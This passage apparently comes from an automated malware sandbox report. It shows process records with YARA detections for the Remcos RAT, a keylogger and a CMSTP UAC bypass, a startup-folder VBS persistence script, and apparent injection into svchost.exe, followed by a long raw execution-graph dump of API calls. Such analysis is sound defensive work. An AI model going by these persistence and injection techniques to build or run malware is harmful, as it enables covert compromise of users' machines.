                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:15:56:58
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736
                  Imagebase:0xee0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:15:57:08
                  Start date:06/09/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Imagebase:0x7ff75af90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:15:57:08
                  Start date:06/09/2024
                  Path:C:\Users\user\AppData\Local\directory\name.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x20000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:true

                  Target ID:12
                  Start time:15:57:09
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x170000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                  Reputation:high
                  Has exited:true

                  Target ID:16
                  Start time:15:57:21
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 784
                  Imagebase:0xee0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:3.8%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:8.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:63
99703->99782 99704->99684 99708 c79997 84 API calls 99705->99708 99715 cdcf0f 99705->99715 99707 cdcff9 99833 c77b52 99707->99833 99711 cdcf36 99708->99711 99709->99705 99954 cd3a2b 75 API calls Mailbox 99711->99954 99714 cdd03c 99717 c781a7 59 API calls 99714->99717 99715->99673 99716 c77b52 59 API calls 99718 cdd019 99716->99718 99719 cdd04a 99717->99719 99718->99714 99721 c77d2c 59 API calls 99718->99721 99720 c77c8e 59 API calls 99719->99720 99722 cdd058 99720->99722 99723 cdd02e 99721->99723 99724 c77c8e 59 API calls 99722->99724 99726 c77d2c 59 API calls 99723->99726 99725 cdd066 99724->99725 99727 c77c8e 59 API calls 99725->99727 99726->99714 99728 cdd074 99727->99728 99729 c79997 84 API calls 99728->99729 99730 cdd080 99729->99730 99836 cd42ad 99730->99836 99732 cdd091 99733 cd3e73 3 API calls 99732->99733 99734 cdd09b 99733->99734 99735 c79997 84 API calls 99734->99735 99738 cdd0cc 99734->99738 99736 cdd0b9 99735->99736 99890 cd93df 99736->99890 99955 c74faa 99738->99955 99741 c79997 84 API calls 99740->99741 99742 ce4787 99741->99742 100544 c763a0 99742->100544 99744 ce4797 99745 ce47bc 99744->99745 99746 c7a000 330 API calls 99744->99746 99748 ce47c0 99745->99748 100569 c79bf8 59 API calls Mailbox 99745->100569 99746->99745 99748->99443 100578 cd4696 GetFileAttributesW 99749->100578 99752->99439 99753->99438 99754->99650 99755->99657 99756->99657 99757->99657 99961 c74d13 99758->99961 99763 cadd0f 99766 c74faa 84 API calls 99763->99766 99764 c74f68 LoadLibraryExW 99971 c74cc8 99764->99971 99768 cadd16 99766->99768 99770 c74cc8 3 API calls 99768->99770 99772 cadd1e 99770->99772 99771 c74f8f 99771->99772 99773 c74f9b 99771->99773 99997 c7506b 99772->99997 99775 c74faa 84 API calls 99773->99775 99777 c74fa0 99775->99777 99777->99677 99777->99680 99779 cadd45 100003 c75027 99779->100003 99783 c777c7 59 API calls 99782->99783 99784 c7470f 99783->99784 99785 c777c7 59 API calls 99784->99785 99786 c74717 99785->99786 99787 c777c7 59 API calls 99786->99787 99788 
c7471f 99787->99788 99789 c777c7 59 API calls 99788->99789 99790 c74727 99789->99790 99791 cad8fb 99790->99791 99792 c7475b 99790->99792 99793 c781a7 59 API calls 99791->99793 99794 c779ab 59 API calls 99792->99794 99795 cad904 99793->99795 99796 c74769 99794->99796 100188 c77eec 99795->100188 99798 c77e8c 59 API calls 99796->99798 99799 c74773 99798->99799 99800 c7479e 99799->99800 99801 c779ab 59 API calls 99799->99801 99802 c747de 99800->99802 99804 c747bd 99800->99804 99815 cad924 99800->99815 99805 c74794 99801->99805 100175 c779ab 99802->100175 99809 c77b52 59 API calls 99804->99809 99808 c77e8c 59 API calls 99805->99808 99806 c747ef 99811 c74801 99806->99811 99813 c781a7 59 API calls 99806->99813 99807 cad9f4 99812 c77d2c 59 API calls 99807->99812 99808->99800 99810 c747c7 99809->99810 99810->99802 99816 c779ab 59 API calls 99810->99816 99814 c74811 99811->99814 99817 c781a7 59 API calls 99811->99817 99828 cad9b1 99812->99828 99813->99811 99819 c74818 99814->99819 99820 c781a7 59 API calls 99814->99820 99815->99807 99818 cad9dd 99815->99818 99827 cad95b 99815->99827 99816->99802 99817->99814 99818->99807 99824 cad9c8 99818->99824 99821 c781a7 59 API calls 99819->99821 99830 c7481f Mailbox 99819->99830 99820->99819 99821->99830 99822 c77b52 59 API calls 99822->99828 99823 cad9b9 99825 c77d2c 59 API calls 99823->99825 99826 c77d2c 59 API calls 99824->99826 99825->99828 99826->99828 99827->99823 99831 cad9a4 99827->99831 99828->99802 99828->99822 100192 c77a84 59 API calls 2 library calls 99828->100192 99830->99707 99832 c77d2c 59 API calls 99831->99832 99832->99828 99834 c77faf 59 API calls 99833->99834 99835 c77b5d 99834->99835 99835->99714 99835->99716 99837 cd42c9 99836->99837 99838 cd42dc 99837->99838 99839 cd42ce 99837->99839 99841 c777c7 59 API calls 99838->99841 99840 c781a7 59 API calls 99839->99840 99889 cd42d7 Mailbox 99840->99889 99842 cd42e4 99841->99842 99843 c777c7 59 API calls 99842->99843 99844 cd42ec 99843->99844 99845 c777c7 59 API calls 
99844->99845 99846 cd42f7 99845->99846 99847 c777c7 59 API calls 99846->99847 99848 cd42ff 99847->99848 99849 c777c7 59 API calls 99848->99849 99850 cd4307 99849->99850 99851 c777c7 59 API calls 99850->99851 99852 cd430f 99851->99852 99853 c777c7 59 API calls 99852->99853 99854 cd4317 99853->99854 99855 c777c7 59 API calls 99854->99855 99856 cd431f 99855->99856 99857 c746f9 59 API calls 99856->99857 99858 cd4336 99857->99858 99859 c746f9 59 API calls 99858->99859 99860 cd434f 99859->99860 99861 c77b52 59 API calls 99860->99861 99862 cd435b 99861->99862 99863 cd436e 99862->99863 99864 c77e8c 59 API calls 99862->99864 99865 c77b52 59 API calls 99863->99865 99864->99863 99866 cd4377 99865->99866 99867 cd4387 99866->99867 99868 c77e8c 59 API calls 99866->99868 99869 c781a7 59 API calls 99867->99869 99868->99867 99870 cd4393 99869->99870 99871 c77c8e 59 API calls 99870->99871 99872 cd439f 99871->99872 100194 cd445f 59 API calls 99872->100194 99874 cd43ae 100195 cd445f 59 API calls 99874->100195 99876 cd43c1 99877 c77b52 59 API calls 99876->99877 99878 cd43cb 99877->99878 99879 cd43d0 99878->99879 99880 cd43e2 99878->99880 99882 c77e0b 59 API calls 99879->99882 99881 c77b52 59 API calls 99880->99881 99883 cd43eb 99881->99883 99884 cd43dd 99882->99884 99885 cd4409 99883->99885 99886 c77e0b 59 API calls 99883->99886 99887 c77c8e 59 API calls 99884->99887 99888 c77c8e 59 API calls 99885->99888 99886->99884 99887->99885 99888->99889 99889->99732 99891 cd93ec __ftell_nolock 99890->99891 99892 c90ff6 Mailbox 59 API calls 99891->99892 99893 cd9449 99892->99893 99894 c7538e 59 API calls 99893->99894 99895 cd9453 99894->99895 100196 cd91e9 99895->100196 99897 cd945e 99898 c75045 85 API calls 99897->99898 99899 cd9471 _wcscmp 99898->99899 99900 cd9495 99899->99900 99901 cd9542 99899->99901 100229 cd99be 96 API calls 2 library calls 99900->100229 100232 cd99be 96 API calls 2 library calls 99901->100232 99904 cd949a 99908 cd954b 99904->99908 100230 c9432e 58 API calls 
__wsplitpath_helper 99904->100230 99905 cd950e _wcscat 99907 c7506b 74 API calls 99905->99907 99905->99908 99909 cd9567 99907->99909 99908->99738 99910 c7506b 74 API calls 99909->99910 99911 cd9577 99910->99911 99913 c7506b 74 API calls 99911->99913 99912 cd94c3 _wcscat _wcscpy 100231 c9432e 58 API calls __wsplitpath_helper 99912->100231 99915 cd9592 99913->99915 99916 c7506b 74 API calls 99915->99916 99917 cd95a2 99916->99917 99918 c7506b 74 API calls 99917->99918 99919 cd95bd 99918->99919 99920 c7506b 74 API calls 99919->99920 99921 cd95cd 99920->99921 99922 c7506b 74 API calls 99921->99922 99923 cd95dd 99922->99923 99924 c7506b 74 API calls 99923->99924 99925 cd95ed 99924->99925 100199 cd9b6d GetTempPathW GetTempFileNameW 99925->100199 99927 cd95f9 99928 c9548b 115 API calls 99927->99928 99939 cd960a 99928->99939 99929 cd96c4 100213 c955d6 99929->100213 99931 cd96cf 99933 cd96e9 99931->99933 99934 cd96d5 DeleteFileW 99931->99934 99932 c7506b 74 API calls 99932->99939 99935 cd978f CopyFileW 99933->99935 99940 cd96f3 _wcsncpy 99933->99940 99934->99908 99939->99908 99939->99929 99939->99932 100200 c94a93 99939->100200 99945->99665 99947 c77e1f 99946->99947 99948 caf173 99946->99948 100539 c77db0 99947->100539 99950 c78189 59 API calls 99948->99950 99952 caf17e __NMSG_WRITE _memmove 99950->99952 99951 c77e2a 99951->99698 99953->99702 99954->99715 99956 c74fb4 99955->99956 99957 c74fbb 99955->99957 99958 c955d6 __fcloseall 83 API calls 99956->99958 99959 c74fdb FreeLibrary 99957->99959 99960 c74fca 99957->99960 99958->99957 99959->99960 99960->99673 100008 c74d61 99961->100008 99964 c74d61 2 API calls 99967 c74d3a 99964->99967 99965 c74d53 99968 c9548b 99965->99968 99966 c74d4a FreeLibrary 99966->99965 99967->99965 99967->99966 100012 c954a0 99968->100012 99970 c74f5c 99970->99763 99970->99764 100081 c74d94 99971->100081 99974 c74d94 2 API calls 99977 c74ced 99974->99977 99975 c74cff FreeLibrary 99976 c74d08 99975->99976 99978 c74dd0 99976->99978 99977->99975 
99977->99976 99979 c90ff6 Mailbox 59 API calls 99978->99979 99980 c74de5 99979->99980 100085 c7538e 99980->100085 99982 c74df1 _memmove 99983 c74f21 99982->99983 99984 c74ee9 99982->99984 99988 c74e2c 99982->99988 100100 cd9ba5 95 API calls 99983->100100 100088 c74fe9 99984->100088 99985 c75027 69 API calls 99994 c74e35 99985->99994 99988->99985 99989 c7506b 74 API calls 99989->99994 99991 c74ec9 99991->99771 99992 cadcd0 99993 c75045 85 API calls 99992->99993 99995 cadce4 99993->99995 99994->99989 99994->99991 99994->99992 100095 c75045 99994->100095 99996 c7506b 74 API calls 99995->99996 99996->99991 99998 c7507d 99997->99998 99999 caddf6 99997->99999 100124 c95812 99998->100124 100002 cd9393 GetSystemTimeAsFileTime 100002->99779 100004 c75036 100003->100004 100005 caddb9 100003->100005 100157 c95e90 100004->100157 100007 c7503e 100009 c74d2e 100008->100009 100010 c74d6a LoadLibraryA 100008->100010 100009->99964 100009->99967 100010->100009 100011 c74d7b GetProcAddress 100010->100011 100011->100009 100015 c954ac _raise 100012->100015 100013 c954bf 100061 c98d68 58 API calls __getptd_noexit 100013->100061 100015->100013 100017 c954f0 100015->100017 100016 c954c4 100062 c98ff6 9 API calls _raise 100016->100062 100031 ca0738 100017->100031 100020 c954f5 100021 c9550b 100020->100021 100022 c954fe 100020->100022 100023 c95535 100021->100023 100024 c95515 100021->100024 100063 c98d68 58 API calls __getptd_noexit 100022->100063 100046 ca0857 100023->100046 100064 c98d68 58 API calls __getptd_noexit 100024->100064 100030 c954cf _raise @_EH4_CallFilterFunc@8 100030->99970 100032 ca0744 _raise 100031->100032 100033 c99e4b __lock 58 API calls 100032->100033 100044 ca0752 100033->100044 100034 ca07c6 100066 ca084e 100034->100066 100035 ca07cd 100071 c98a5d 58 API calls 2 library calls 100035->100071 100038 ca0843 _raise 100038->100020 100039 ca07d4 100039->100034 100072 c9a06b InitializeCriticalSectionAndSpinCount 100039->100072 100041 c99ed3 __mtinitlocknum 58 API calls 
100041->100044 100043 ca07fa RtlEnterCriticalSection 100043->100034 100044->100034 100044->100035 100044->100041 100069 c96e8d 59 API calls __lock 100044->100069 100070 c96ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 100044->100070 100055 ca0877 __wopenfile 100046->100055 100047 ca0891 100076 c98d68 58 API calls __getptd_noexit 100047->100076 100048 ca0a4c 100048->100047 100052 ca0aaf 100048->100052 100050 ca0896 100077 c98ff6 9 API calls _raise 100050->100077 100073 ca87f1 100052->100073 100053 c95540 100065 c95562 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100053->100065 100055->100047 100055->100048 100078 c93a0b 60 API calls 2 library calls 100055->100078 100057 ca0a45 100057->100048 100079 c93a0b 60 API calls 2 library calls 100057->100079 100059 ca0a64 100059->100048 100080 c93a0b 60 API calls 2 library calls 100059->100080 100061->100016 100062->100030 100063->100030 100064->100030 100065->100030 100067 c99fb5 _doexit RtlLeaveCriticalSection 100066->100067 100068 ca0855 100067->100068 100068->100038 100069->100044 100070->100044 100071->100039 100072->100043 100074 ca7fd5 __wsopen_helper 109 API calls 100073->100074 100075 ca880a 100074->100075 100075->100053 100076->100050 100077->100053 100078->100057 100079->100059 100080->100048 100082 c74ce1 100081->100082 100083 c74d9d LoadLibraryA 100081->100083 100082->99974 100082->99977 100083->100082 100084 c74dae GetProcAddress 100083->100084 100084->100082 100086 c90ff6 Mailbox 59 API calls 100085->100086 100087 c753a0 100086->100087 100087->99982 100089 c74fff 100088->100089 100090 c75003 FindResourceExW 100089->100090 100094 c75020 100089->100094 100091 cadd5c LoadResource 100090->100091 100090->100094 100092 cadd71 SizeofResource 100091->100092 100091->100094 100093 cadd85 LockResource 100092->100093 100092->100094 100093->100094 100094->99988 100096 c75054 100095->100096 100099 caddd4 100095->100099 100101 c95a7d 100096->100101 100098 c75062 100098->99994 100100->99988 100105 
c95a89 _raise 100101->100105 100102 c95a9b 100114 c98d68 58 API calls __getptd_noexit 100102->100114 100104 c95ac1 100116 c96e4e 100104->100116 100105->100102 100105->100104 100106 c95aa0 100115 c98ff6 9 API calls _raise 100106->100115 100111 c95ad6 100123 c95af8 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100111->100123 100113 c95aab _raise 100113->100098 100114->100106 100115->100113 100117 c96e5e 100116->100117 100118 c96e80 RtlEnterCriticalSection 100116->100118 100117->100118 100119 c96e66 100117->100119 100120 c95ac7 100118->100120 100121 c99e4b __lock 58 API calls 100119->100121 100122 c959ee 83 API calls 4 library calls 100120->100122 100121->100120 100122->100111 100123->100113 100127 c9582d 100124->100127 100126 c7508e 100126->100002 100128 c95839 _raise 100127->100128 100129 c9587c 100128->100129 100130 c95874 _raise 100128->100130 100132 c9584f _memset 100128->100132 100131 c96e4e __lock_file 59 API calls 100129->100131 100130->100126 100133 c95882 100131->100133 100154 c98d68 58 API calls __getptd_noexit 100132->100154 100140 c9564d 100133->100140 100136 c95869 100155 c98ff6 9 API calls _raise 100136->100155 100141 c95683 100140->100141 100143 c95668 _memset 100140->100143 100156 c958b6 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100141->100156 100142 c95673 100144 c98d68 _raise 58 API calls 100142->100144 100143->100141 100143->100142 100147 c956c3 100143->100147 100153 c95678 100144->100153 100145 c98ff6 _raise 9 API calls 100145->100141 100146 ca0df7 __filbuf 72 API calls 100146->100147 100147->100141 100147->100146 100148 c957d4 _memset 100147->100148 100149 c94916 __ftell_nolock 58 API calls 100147->100149 100150 ca0f18 _memcpy_s 58 API calls 100147->100150 100152 ca10ab __read_nolock 70 API calls 100147->100152 100151 c98d68 _raise 58 API calls 100148->100151 100149->100147 100150->100147 100151->100153 100152->100147 100153->100145 100154->100136 100155->100130 100156->100130 100158 c95e9c _raise 100157->100158 100159 
c95eae 100158->100159 100160 c95ec3 100158->100160 100171 c98d68 58 API calls __getptd_noexit 100159->100171 100161 c96e4e __lock_file 59 API calls 100160->100161 100164 c95ec9 100161->100164 100163 c95eb3 100172 c98ff6 9 API calls _raise 100163->100172 100173 c95b00 67 API calls 5 library calls 100164->100173 100167 c95ebe _raise 100167->100007 100168 c95ed4 100174 c95ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100168->100174 100170 c95ee6 100170->100167 100171->100163 100172->100167 100173->100168 100174->100170 100176 c77a17 100175->100176 100177 c779ba 100175->100177 100178 c77e8c 59 API calls 100176->100178 100177->100176 100179 c779c5 100177->100179 100184 c779e8 _memmove 100178->100184 100180 c779e0 100179->100180 100181 caef32 100179->100181 100193 c78087 59 API calls Mailbox 100180->100193 100183 c78189 59 API calls 100181->100183 100185 caef3c 100183->100185 100184->99806 100186 c90ff6 Mailbox 59 API calls 100185->100186 100187 caef5c 100186->100187 100189 c77f06 100188->100189 100190 c77ef9 100188->100190 100191 c90ff6 Mailbox 59 API calls 100189->100191 100190->99800 100191->100190 100192->99828 100193->100184 100194->99874 100195->99876 100264 c9543a GetSystemTimeAsFileTime 100196->100264 100198 cd91f8 100198->99897 100199->99927 100201 c94a9f _raise 100200->100201 100202 c94abd 100201->100202 100203 c94ad5 100201->100203 100204 c94acd _raise 100201->100204 100278 c98d68 58 API calls __getptd_noexit 100202->100278 100205 c96e4e __lock_file 59 API calls 100203->100205 100204->99939 100207 c94adb 100205->100207 100266 c9493a 100207->100266 100208 c94ac2 100279 c98ff6 9 API calls _raise 100208->100279 100214 c955e2 _raise 100213->100214 100215 c955f6 100214->100215 100216 c9560e 100214->100216 100425 c98d68 58 API calls __getptd_noexit 100215->100425 100218 c96e4e __lock_file 59 API calls 100216->100218 100222 c95606 _raise 100216->100222 100221 c95620 100218->100221 100219 c955fb 100426 c98ff6 9 API calls _raise 100219->100426 100409 
c9556a 100221->100409 100222->99931 100229->99904 100230->99912 100231->99905 100232->99905 100265 c95468 __aulldiv 100264->100265 100265->100198 100268 c94949 100266->100268 100273 c94967 100266->100273 100267 c94957 100268->100267 100268->100273 100275 c94981 _memmove 100268->100275 100280 c94b0d RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100273->100280 100275->100273 100281 c94916 100275->100281 100288 c9dac6 100275->100288 100278->100208 100279->100204 100280->100204 100410 c95579 100409->100410 100411 c9558d 100409->100411 100425->100219 100426->100222 100540 c77dbf __NMSG_WRITE 100539->100540 100541 c78189 59 API calls 100540->100541 100542 c77dd0 _memmove 100540->100542 100543 caf130 _memmove 100541->100543 100542->99951 100545 c77b76 59 API calls 100544->100545 100562 c763c5 100545->100562 100546 c765ca 100572 c7766f 59 API calls 2 library calls 100546->100572 100548 c765e4 Mailbox 100548->99744 100551 c77eec 59 API calls 100551->100562 100552 c768f9 _memmove 100577 ccfdba 91 API calls 4 library calls 100552->100577 100553 cae41f 100575 ccfdba 91 API calls 4 library calls 100553->100575 100554 c7766f 59 API calls 100554->100562 100558 cae42d 100576 c7766f 59 API calls 2 library calls 100558->100576 100560 cae443 100560->100548 100561 cae3bb 100563 c78189 59 API calls 100561->100563 100562->100546 100562->100551 100562->100552 100562->100553 100562->100554 100562->100561 100566 c77faf 59 API calls 100562->100566 100570 c760cc 60 API calls 100562->100570 100571 c75ea1 59 API calls Mailbox 100562->100571 100573 c75fd2 60 API calls 100562->100573 100574 c77a84 59 API calls 2 library calls 100562->100574 100564 cae3c6 100563->100564 100568 c90ff6 Mailbox 59 API calls 100564->100568 100567 c7659b CharUpperBuffW 100566->100567 100567->100562 100568->100552 100569->99748 100570->100562 100571->100562 100572->100548 100573->100562 100574->100562 100575->100558 100576->100560 100577->100548 100579 cd3e7a 100578->100579 100580 cd46b1 FindFirstFileW 
100578->100580 100579->99443 100580->100579 100581 cd46c6 FindClose 100580->100581 100581->100579 100583 c782ef 100582->100583 100586 c7830a 100582->100586 100584 c77faf 59 API calls 100583->100584 100585 c782f7 CharUpperBuffW 100584->100585 100585->100586 100586->99452 100588 c7f3b1 100587->100588 100590 c7f3d2 100588->100590 100698 cda0b5 89 API calls 4 library calls 100588->100698 100590->99457 100592 c784ed 100591->100592 100593 caf1e6 100591->100593 100594 c90ff6 Mailbox 59 API calls 100592->100594 100595 c784f4 100594->100595 100596 c78515 100595->100596 100699 c78794 59 API calls Mailbox 100595->100699 100596->99471 100596->99479 100599 cb50ed 100598->100599 100611 c80b55 100598->100611 100742 cda0b5 89 API calls 4 library calls 100599->100742 100601 c80e5a 100601->99499 100603 c81044 100603->100601 100605 c81051 100603->100605 100740 c811f3 330 API calls Mailbox 100605->100740 100606 c80bab PeekMessageW 100663 c80b65 Mailbox 100606->100663 100609 c81058 LockWindowUpdate DestroyWindow GetMessageW 100609->100601 100613 c8108a 100609->100613 100610 c80e44 100610->100601 100739 c811d0 10 API calls Mailbox 100610->100739 100611->100663 100743 c79fbd 60 API calls 100611->100743 100744 cc68bf 330 API calls 100611->100744 100612 cb52ab Sleep 100612->100663 100615 cb6082 TranslateMessage DispatchMessageW GetMessageW 100613->100615 100615->100615 100616 cb60b2 100615->100616 100616->100601 100617 c80fbf TranslateMessage DispatchMessageW 100618 c80fa3 PeekMessageW 100617->100618 100618->100663 100619 cb517a TranslateAcceleratorW 100619->100618 100619->100663 100620 c90ff6 59 API calls Mailbox 100620->100663 100621 c80e73 timeGetTime 100621->100663 100622 cb5c49 WaitForSingleObject 100627 cb5c66 GetExitCodeProcess CloseHandle 100622->100627 100622->100663 100624 c80fdd Sleep 100660 c80fee Mailbox 100624->100660 100625 c781a7 59 API calls 100625->100663 100626 c777c7 59 API calls 100626->100660 100658 c810f5 100627->100658 100628 cb5f22 Sleep 100628->100660 100630 
c7b89c 303 API calls 100630->100663 100632 c90719 timeGetTime 100632->100660 100633 c810ae timeGetTime 100741 c79fbd 60 API calls 100633->100741 100636 cb5fb9 GetExitCodeProcess 100641 cb5fcf WaitForSingleObject 100636->100641 100642 cb5fe5 CloseHandle 100636->100642 100637 c79997 84 API calls 100637->100663 100639 cf61ac 110 API calls 100639->100660 100640 c7b93d 109 API calls 100640->100660 100641->100642 100641->100663 100642->100660 100644 cb5c9e 100644->100658 100645 c79fbd 60 API calls 100645->100663 100646 cb6041 Sleep 100646->100663 100647 cb54a2 Sleep 100647->100663 100650 c77f41 59 API calls 100650->100660 100654 c7a000 303 API calls 100654->100663 100656 c7f5c0 303 API calls 100656->100663 100657 c7fe40 303 API calls 100657->100663 100658->99499 100660->100626 100660->100632 100660->100636 100660->100639 100660->100640 100660->100644 100660->100646 100660->100647 100660->100650 100660->100658 100660->100663 100751 cd28f7 60 API calls 100660->100751 100752 c79fbd 60 API calls 100660->100752 100753 c78b13 69 API calls Mailbox 100660->100753 100754 c7b89c 330 API calls 100660->100754 100755 cc6a50 60 API calls 100660->100755 100756 cd54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100660->100756 100757 cd3e91 66 API calls Mailbox 100660->100757 100662 cda0b5 89 API calls 100662->100663 100663->100606 100663->100610 100663->100612 100663->100617 100663->100618 100663->100619 100663->100620 100663->100621 100663->100622 100663->100624 100663->100625 100663->100628 100663->100630 100663->100633 100663->100637 100663->100645 100663->100654 100663->100656 100663->100657 100663->100658 100663->100660 100663->100662 100664 c79df0 59 API calls Mailbox 100663->100664 100665 c78620 69 API calls 100663->100665 100666 cc66f4 59 API calls Mailbox 100663->100666 100668 c77f41 59 API calls 100663->100668 100669 c78b13 69 API calls 100663->100669 100670 cb59ff VariantClear 100663->100670 100671 cb5a95 VariantClear 100663->100671 
100672 cb5843 VariantClear 100663->100672 100673 cc7405 59 API calls 100663->100673 100674 c78e34 59 API calls Mailbox 100663->100674 100700 c7e580 100663->100700 100707 c7e800 100663->100707 100738 c731ce IsDialogMessageW GetClassLongW 100663->100738 100745 cf629f 59 API calls 100663->100745 100746 cd9c9f 59 API calls Mailbox 100663->100746 100747 ccd9e3 59 API calls 100663->100747 100748 cc6665 59 API calls 2 library calls 100663->100748 100749 c78561 59 API calls 100663->100749 100750 c7843f 59 API calls Mailbox 100663->100750 100664->100663 100665->100663 100666->100663 100668->100663 100669->100663 100670->100663 100671->100663 100672->100663 100673->100663 100674->100663 100675->99524 100676->99528 100677->99522 100678->99522 100679->99453 100680->99465 100681->99463 100682->99465 100683->99465 100684->99467 100685->99480 100686->99476 100687->99476 100688->99478 100689->99482 100690->99522 100691->99522 100692->99522 100693->99522 100694->99465 100695->99507 100696->99517 100697->99465 100698->100590 100699->100596 100701 c7e5b1 100700->100701 100702 c7e59d 100700->100702 100759 cda0b5 89 API calls 4 library calls 100701->100759 100758 c7e060 330 API calls 2 